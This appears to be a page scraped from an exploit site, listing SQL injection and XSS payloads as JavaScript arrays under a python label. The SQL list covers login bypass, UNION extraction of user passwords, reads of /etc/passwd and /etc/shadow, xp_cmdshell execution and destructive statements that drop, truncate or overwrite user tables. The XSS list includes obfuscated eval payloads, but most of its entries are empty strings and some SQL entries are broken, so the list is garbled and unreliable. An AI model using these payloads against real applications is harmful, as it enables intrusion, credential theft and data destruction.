## https://sploitus.com/exploit?id=4994503E-B397-57CB-84AC-BE73005C489F
# SQL Injection Payloads List
SQL Injection Payloads List
```python
#๐ SQL Injection Payloads List
const sqlPayloads = [
"'", '"', "' OR 1=1 --", '" OR 1=1 --', "' UNION SELECT 1,2 --", "'; DROP TABLE users; --",
"' OR 'a'='a", "' OR 'a'='a' --", "'; EXEC xp_cmdshell('ping 127.0.0.1'); --",
"'; WAITFOR DELAY '0:0:5' --", "'; SELECT SLEEP(5) --", "'; SELECT pg_sleep(5) --",
"'; SELECT sleep(5) --", "admin'--", "admin' #", "admin'/*", "' OR 1=1#", "' OR 1=1--",
"' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1'#", "' OR 1=1 LIMIT 1;--",
"' OR 1=1 LIMIT 1;#", "' OR 1=1 LIMIT 1;/*", "1' OR '1'='1", "1' OR '1'='1'/*",
"1' OR '1'='1'#", "1' OR 1=1--", "1' OR 1=1#", "1' OR 1=1/*", "' OR ''='", "' OR '='",
"1' AND '1'='1", "1' AND '1'='2", "' AND 1=1--", "' AND 1=2--", "' AND 'x'='x",
"' AND 'x'='y", "' AND 1=1 #", "' AND 2>1 --",
"' UNION ALL SELECT NULL--", "' UNION SELECT NULL,NULL--", "' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT username,password FROM users--", "' UNION SELECT database()--",
"' UNION SELECT user()--", "' UNION SELECT version()--",
"' AND SLEEP(5)--", "' AND BENCHMARK(10000000,MD5('A'))--", "' OR SLEEP(5)--",
"1' AND SLEEP(5)#", "' AND IF(1=1,SLEEP(5),0)--",
"1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()),0x7e))--",
"1' AND UpdateXml(1, Concat(0x7e, (SELECT database()),0x7e), 1)--",
"1' ORDER BY 1--", "1' ORDER BY 2--", "1' ORDER BY 3--", "1' ORDER BY 4--", "1' ORDER BY 5--",
"' GROUP BY 1--", "' GROUP BY 2--", "' GROUP BY 3--",
"1' UNION SELECT table_schema,table_name FROM information_schema.tables--",
"1' UNION SELECT column_name,column_type FROM information_schema.columns--",
"' UNION SELECT @@version,NULL--", "' UNION SELECT @@datadir,NULL--",
"'; DROP TABLE users;--", "'; DELETE FROM users;--", "'; UPDATE users SET password='hacked';--",
"'; INSERT INTO users VALUES('hacker','hacked');--", "'; TRUNCATE TABLE users;--",
"' OR 'x'='x' OR 'x'='", "' OR 'a'>'", "' OR 'a'2,'true','false')--",
"' UNION SELECT IF(1=1,version(),NULL)--",
"1' UNION SELECT LOAD_FILE('/etc/passwd')--",
"1' UNION SELECT LOAD_FILE('/etc/shadow')--",
"' OR SUBSTR(user(),1,1)='a'--", "' OR ASCII(SUBSTR(user(),1,1))>64--",
"' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--",
"' AND (SELECT COUNT(*) FROM users) > 0--",
"' UNION SELECT CAST(id AS CHAR),CAST(name AS CHAR)--",
"' UNION SELECT CONCAT(user,':',password) FROM mysql.user--",
"admin' OR 'x'='x' --", "' OR '1'='1' UNION SELECT NULL,NULL--",
"' OR 1=1 UNION ALL SELECT NULL--",
];
XSS
const xssPayloads = [
"alert('XSS')", "",
"javascript:alert(1)", "", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "XSS",
"Click", "Click",
"Click",
"", "",
"", "",
"",
"",
"body{background:url(javascript:alert(1))}",
"", "",
"",
"", "",
"", "",
"alert('XSS')", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"", "",
"eval(atob('YWxlcnQoJ1hTUycpOw=='))",
"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))",
"",
"",
"",
"",
"alert(1)'>XSS",
"",
"'\">alert(1)<\"",
];
```